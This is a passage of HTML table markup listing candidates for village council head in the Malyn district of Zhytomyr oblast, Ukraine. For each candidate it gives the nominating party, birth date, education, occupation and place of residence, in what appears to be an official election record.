Вишівська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самородов Сергій Володимирович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 14.02.1974 р., освіта вища, безпартійний, Вишівська сільська рада, Сільський голова, місце проживання: Житомирська обл., Малинський р-н, с. Вишів</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Владівська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Баранівський Віктор Петрович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 24.10.1978 р., освіта загальна середня, безпартійний, Тимчасово не працюючий, Владівський сільський голова, місце проживання: Житомирська обл., Малинський р-н, с.Владівка</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Ворсівська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Підручний Петро Михайлович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 04.08.1957 р., освіта середня спеціальна, безпартійний, Ворсівська сільська рада, Сільський голова, місце проживання: Житомирська обл., Малинський р-н, с.Ворсівка</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Головківська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Ярмоченко Ігор Віталійович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Політична Партія \"Опозиційний блок\"</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 29.09.1961 р., освіта вища, член Політичної Партії \"Опозиційний блок\", Головківська сільська рада, Сільський голова, місце проживання: м. Малин</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Горинська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Омельченко Володимир Михайлович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 23.08.1957 р., освіта вища, безпартійний, Горинська с/р, Сільський голова Горинської с/р, місце проживання: Житомирська обл., м.Малин</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Дібрівська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Лакей Василь Микола-Йович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 24.02.1962 р., освіта професійно-технічна, безпартійний, Дібрівська сільська рада, Сільський голова, місце проживання: Житомирська обл., Малинський р-н, с.Лісна Колона</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Іванівська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Давиденко Надія Броніславівна</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянка України, народилася 13.02.1966 р., освіта вища, безпартійна, Іванівська с/р, голова, місце проживання: Житомирська обл., Малинський р-н, с.Іванівка</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Йосипівська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Шоботенко Галина Адольфівна</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянка України, народилася 21.07.1972 р., освіта вища, член Народної Партії, Йосипівська сільська рада Малинського району Житомирської області, Сільський голова, місце проживання: с. Йосипівка Малинський район Житомирська область</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Ксаверівська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Гаращук Василь Іванович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 14.04.1963 р., освіта загальна середня, безпартійний, Ксаверівська сільська рада, Сільський голова, місце проживання: с.Савлуки Малинський район Житомирська область</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Луківська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Венглівський Іван Андрійович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 19.01.1965 р., освіта професійно-технічна, безпартійний, Луківська сільська рада, Сільський голова, місце проживання: Житомирська обл., Малинський р-н, с.Буки</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Любовицька сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Мельник Віктор Григорович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 17.05.1960 р., освіта вища, безпартійний, Сільська рада, голова, місце проживання: С.Любовичі</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Малинівська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: times new roman,times;\">&nbsp;Парфіненко Наталія Юріївна</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: times new roman,times;\">&nbsp;Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: times new roman,times;\">&nbsp;Громадянка України, народилася 31.08.1987 р., освіта вища, безпартійна, Малинівська сільська рада, Секретар, місце проживання: Житомирська обл., Малинський р-н, с.Малинівка</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Морозівська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Корбут Яросла<span id=\"transmark\"></span>в Анатолійович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 16.10.1979 р., освіта вища, член Народної Партії, Морозівська ЗОШ I-II ступенів, Вчитель, місце проживання: Житомирська обл., Малинський р-н, с.Морозівка</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Недашківська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Недашківський Валерій Іванович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 06.03.1972 р., освіта професійно-технічна, безпартійний, Недашківська сільська рада, голова, місце проживання: с.Недашки, Малинський р-н, Житомирська обл.</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Нововороб\'ївська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Тимошенко Микола Іванович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 05.12.1956 р., освіта професійно-технічна, безпартійний, Нововороб&rsquo;ївська сільська рада, Голова, місце проживання: м. Малин Житомирської обл..</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Пиріжківська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Марченко Анатолій Васильович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 22.06.1967 р., освіта вища, безпартійний, Пиріжківська сільська рада, сільський голова, місце проживання: Житомирська обл., Малинський р-н, с.Пиріжки</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Скуратівська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Строга Оксана Іванівна</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянка України, народилася 19.05.1969 р., освіта вища, член Народної Партії, Скур. ЗОШ, Вчитель, місце проживання: Житомирська обл., Малинський р-н, с.Скурати</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Слобідська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Єщенко Микола Миколайович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 25.05.1959 р., освіта вища, безпартійний, Слобідська сільська рада, Сільський голова, місце проживання: Житомирська обл., Малинський р-н, с.Гамарня</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Старовороб\'ївська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Дубас Людмила Іванівна</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянка України, народилася 01.03.1972 р., освіта вища, безпартійна, Старовороб&rsquo;ївська сільська рада, голова, місце проживання: Житомирська обл., Малинський р-н, с.Старі Вороб&rsquo;ї</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Українківська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Друзь Сергій Миколайович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 14.10.1961 р., освіта середня спеціальна, безпартійний, Будинок культури с.Українка, Худ. керівник, місце проживання: Житомирська обл., Малинський р-н, с.Українка</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Устинівська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Кириченко Валентин Васильович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 21.06.1971 р., освіта професійно-технічна, безпартійний, Устинівська сільська рада, головний бухгалтер, місце проживання: Житомирська обл., Малинський р-н, с.Устинівка</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Федорівська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Саміла Олександр Андрійович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 10.05.1965 р., освіта вища, безпартійний, Сільська рада, Голова сільради, місце проживання: Житомирська обл. Малинський р-н, с.Федорівка</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Шевченківська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Кононученко Олена Григорівна</span></td>\r\n<td style=\"width: 70.15pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянка України, народилася 05.10.1965 р., освіта середня спеціальна, безпартійна, Шевченків-ська сільсь- ка рада, Сільський голова, місце проживання: Житомирська обл., Малинський р-н, </span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: medium 1pt medium medium; border-style: none solid none none; border-color: -moz-use-text-color windowtext -moz-use-text-color -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Гранітненська селищна рада</span></td>\r\n<td style=\"width: 82.85pt; border-width: medium 1pt; border-style: none solid; border-color: -moz-use-text-color windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Курса Микола Іванович</span></td>\r\n<td style=\"width: 70.15pt; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: medium medium medium 